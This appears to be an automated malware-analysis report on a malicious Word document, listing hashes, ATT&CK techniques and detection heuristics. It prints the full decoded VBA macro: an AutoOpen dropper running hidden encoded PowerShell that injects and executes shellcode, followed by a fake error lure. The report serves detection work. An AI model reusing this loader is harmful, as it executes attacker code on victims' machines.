Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 db53b4157868fffd…

MALICIOUS

Office (OLE)

39.0 KB Created: 2018-09-09 09:44:00 Authoring application: Microsoft Office Word First seen: 2018-11-05
MD5: 10d12a4363a4ca5cb369edd4d6df108e SHA-1: 9ff035e1d7517ac3c081a1a25382fa862dd1f87d SHA-256: db53b4157868fffd0331c1498e2209c11499b14f5aa980fe4fb3453858ed90b5
312 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample contains VBA macros with an AutoOpen subroutine that executes a PowerShell command. The PowerShell command is heavily obfuscated but appears to download and execute a second-stage payload. The document body uses a common lure to convince users to enable macros.

Heuristics 10

  • ClamAV: Doc.Dropper.MagicHound-5859115-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.MagicHound-5859115-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    & "IAFMAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAQwBIAFMAIAAkAGUAIgA7AH0A"
Shell ("powershell.exe " & x)
Dim title As String
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
    & "IAFMAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAQwBIAFMAIAAkAGUAIgA7AH0A"
Shell ("powershell.exe " & x)
Dim title As String
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
Sub AutoOpen()
Dim x
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7739 bytes
SHA-256: 91c68affec5595a95b7a5b4a448a5e7fa75e69982ad695d609ba536010bc42f5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 18 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim x
x = "-window hidden -e JABHADgAdAAgAD0AIAAnACQAQgBtAHQAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8" _
& "AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgA" _
& "gAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQ" _
& "AcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAQgBtAHQAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAA" _
& "wAHgAYgBhACwAMAB4AGYANwAsADAAeABjADYALAAwAHgANABlACwAMAB4ADAAMwAsADAAeABkADkALAAwAHgAZQBiACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1ADgALAAwAHgAMwAxACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANAA3ACwAMAB4ADMAMQAsADAAeAA1ADAALAAwAHgAMQAzACwAMAB4ADAAMwAsADAAeAA1ADAALAAwAHgAMQAzACwAMAB4ADgAMwAsADAAeABlADgALAAwAHgAMABiACwAMAB4ADIANAAsADAAeABiAGIALAAwAHgAZgBmACwAMAB4ADE" _
& "AYgAsADAAeAAyAGIALAAwAHgANAA0ACwAMAB4ADAAMAAsADAAeABkAGIALAAwAHgANABjACwAMAB4AGMAYwAsADAAeABlADUALAAwAHgAZQBhACwAMAB4ADQAYwAsADAAeABhAGEALAAwAHgANgBlACwAMAB4ADUAYwAsADAAeAA3AGQALAAwAHgAYgA4ACwAMAB4ADIAMwAsADAAeAA1ADAALAAwAHgAZgA2ACwAMAB4AGUAYwAsADAAeABkADcALAAwAHgAZQAzACwAMAB4ADcAYQAsADAAeAAzADkALAAwAHgAZAA3ACwAMAB4ADQANAAsADAAeAAzADAALAAwAHgAMQBmACwAMAB4AGQANgAsADAAeAA1ADUALAA" _
& "wAHgANgA5ACwAMAB4ADYAMwAsADAAeAA3ADkALAAwAHgAZAA1ACwAMAB4ADcAMAAsADAAeABiADAALAAwAHgANQA5ACwAMAB4AGUANAAsADAAeABiAGEALAAwAHgAYwA1ACwAMAB4ADkAOAAsADAAeAAyADEALAAwAHgAYQA2ACwAMAB4ADIANAAsADAAeABjADgALAAwAHgAZgBhACwAMAB4AGEAYwAsADAAeAA5AGIALAAwAHgAZgBkACwAMAB4ADgAZgAsADAAeABmADkALAAwAHgAMgA3ACwAMAB4ADcANQAsADAAeABjADMALAAwAHgAZQBjACwAMAB4ADIAZgAsADAAeAA2AGEALAAwAHgAOQAzACwAMAB4ADA" _
& "AZgAsADAAeAAwADEALAAwAHgAMwBkACwAMAB4AGEAOAAsADAAeAA0ADkALAAwAHgAOAAxACwAMAB4AGIAZgAsADAAeAA3AGQALAAwAHgAZQAyACwAMAB4ADgAOAAsADAAeABhADcALAAwAHgANgAyACwAMAB4AGMAZgAsADAAeAA0ADMALAAwAHgANQAzACwAMAB4ADUAMAAsADAAeABiAGIALAAwAHgANQA1ACwAMAB4AGIANQAsADAAeABhADkALAAwAHgANAA0ACwAMAB4AGYAOQAsADAAeABmADgALAAwAHgAMAA2ACwAMAB4AGIANwAsADAAeAAwADMALAAwAHgAMwBjACwAMAB4AGEAMAAsADAAeAAyADgALAA" _
& "wAHgANwA2ACwAMAB4ADMANAAsADAAeABkADMALAAwAHgAZAA1ACwAMAB4ADgAMQAsADAAeAA4ADMALAAwAHgAYQBlACwAMAB4ADAAMQAsADAAeAAwADcALAAwAHgAMQAwACwAMAB4ADAAOAAsADAAeABjADEALAAwAHgAYgBmACwAMAB4AGYAYwAsADAAeABhADkALAAwAHgAMAA2ACwAMAB4ADUAOQAsADAAeAA3ADYALAAwAHgAYQA1ACwAMAB4AGUAMwAsADAAeAAyAGQALAAwAHgAZAAwACwAMAB4AGEAOQAsADAAeABmADIALAAwAHgAZQAyACwAMAB4ADYAYQAsADAAeABkADUALAAwAHgANwBmACwAMAB4ADA" _
& "ANQAsADAAeABiAGQALAAwAHgANQBjACwAMAB4ADMAYgAsADAAeAAyADIALAAwAHgAMQA5ACwAMAB4ADAANQAsADAAeAA5AGYALAAwAHgANABiACwAMAB4ADMAOAAsADAAeABlADMALAAwAHgANABlACwAMAB4ADcAMwAsADAAeAA1AGEALAAwAHgANABjACwAMAB4ADIAZQAsADAAeABkADEALAAwAHgAMQAwACwAMAB4ADYAMAAsADAAeAAzAGIALAAwAHgANgA4ACwAMAB4ADcAYgAsADAAeABlAGMALAAwAHgAOAA4ACwAMAB4ADQAMQAsADAAeAA4ADQALAAwAHgAZQBjACwAMAB4ADgANgAsADAAeABkADIALAA" _
& "wAHgAZgA3ACwAMAB4AGQAZQAsADAAeAAwADkALAAwAHgANAA5ACwAMAB4ADkAMAAsADAAeAA1ADIALAAwAHgAYwAxACwAMAB4ADUANwAsADAAeAA2ADcALAAwAHgAOQA1ACwAMAB4AGYAOAAsADAAeAAyADAALAAwAHgAZgA3ACwAMAB4ADYAOAAsADAAeAAwADMALAAwAHgANQAxACwAMAB4AGQAMQAsADAAeABhAGUALAAwAHgANQA3ACwAMAB4ADAAMQAsADAAeAA0ADkALAAwAHgAMAA3ACwAMAB4AGQAOAAsADAAeABjAGEALAAwAHgAOAA5ACwAMAB4AGEAOAAsADAAeAAwAGQALAAwAHgANgA2ACwAMAB4ADg" _
& "AZgAsADAAeAAzAGUALAAwAHgANgBlACwAMAB4AGQAZgAsADAAeAA4ADUALAAwAHgAYQBjACwAMAB4ADAANgAsADAAeAAyADIALAAwAHgAOQBhACwAMAB4AGMANQAsADAAeAA2ADUALAAwAHgAYQBiACwAMAB4ADcAYwAsADAAeABiADUALAAwAHgAZAA5ACwAMAB4AGYAYwAsADAAeABkADAALAAwAHgANwA1ACwAMAB4ADgAYQAsADAAeABiAGMALAAwAHgAOAAwACwAMAB4ADEAZAAsADAAeABjADAALAAwAHgAMwAyACwAMAB4AGYAZQAsADAAeAAzAGQALAAwAHgAZQBiACwAMAB4ADkAOAAsADAAeAA5ADcALAA" _
& "wAHgAZAA3ACwAMAB4ADAANAAsADAAeAA3ADUALAAwAHgAYwBmACwAMAB4ADQAZgAsADAAeABiAGMALAAwAHgAZABjACwAMAB4ADkAYgAsADAAeABlAGUALAAwAHgANAAxACwAMAB4AGMAYgAsADAAeABlADEALAAwAHgAMwAwACwAMAB4AGMAOQAsADAAeABmADgALAAwAHgAMQA2ACwAMAB4AGYAZQAsADAAeAAzAGEALAAwAHgANwA0ACwAMAB4ADAANQAsADAAeAA5ADYALAAwAHgAYwBhACwAMAB4AGMAMwAsADAAeAA3ADcALAAwAHgAMwAwACwAMAB4AGQANAAsADAAeABmADkALAAwAHgAMQAyACwAMAB4AGI" _
& "AYwAsADAAeAA0ADAALAAwAHgAMAA2ACwAMAB4AGIANQAsADAAeABlAGIALAAwAHgAZgBjACwAMAB4ADAANAAsADAAeABlADAALAAwAHgAZABiACwAMAB4AGEAMgAsADAAeABmADcALAAwAHgAYwA3ACwAMAB4ADUAMAAsADAAeAA2AGEALAAwAHgANgAyACwAMAB4AGEAOAAsADAAeAAwAGUALAAwAHgAOQAzACwAMAB4ADYAMgAsADAAeAAyADgALAAwAHgAYwBlACwAMAB4AGMANQAsADAAeABlADgALAAwAHgAMgA4ACwAMAB4AGEANgAsADAAeABiADEALAAwAHgANAA4ACwAMAB4ADcAYgAsADAAeABkADMALAA" _
& "wAHgAYgBkACwAMAB4ADQANAAsADAAeABlAGYALAAwAHgANAA4ACwAMAB4ADIAOAAsADAAeAA2ADcALAAwAHgANAA2ACwAMAB4ADMAZAAsADAAeABmAGIALAAwAHgAMABmACwAMAB4ADYANAAsADAAeAAxADgALAAwAHgAYwBiACwAMAB4ADgAZgAsADAAeAA5ADcALAAwAHgANABmACwAMAB4AGMAZAAsADAAeABlAGMALAAwAHgANAAxACwAMAB4AGEAOQAsADAAeABiAGIALAAwAHgAMQBjACwAMAB4ADUAMgA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGc" _
& "AdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAQwB3AGgAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAEMAdwBoAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQA" _
& "sACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABDAHcAaAAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGU" _
& "ALgBHAGUAdABCAHkAdABlAHMAKAAkAEcAOAB0ACkAKQA7ACQAQwBIAFMAIAA9ACAAIgAtAGUAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAGsAdwB2AEYAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAawB3AHYARgAgACQAQwB" _
& "IAFMAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAQwBIAFMAIAAkAGUAIgA7AH0A"
Shell ("powershell.exe " & x)
Dim title As String
title = "Critical Microsoft Office Error"
Dim msg As String
Dim intResponse As Integer
msg = "This document appears to be corrupt or missing critical rows in order to restore. Please restore this file from a backup."
intResponse = MsgBox(msg, 16, title)
Application.Quit
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.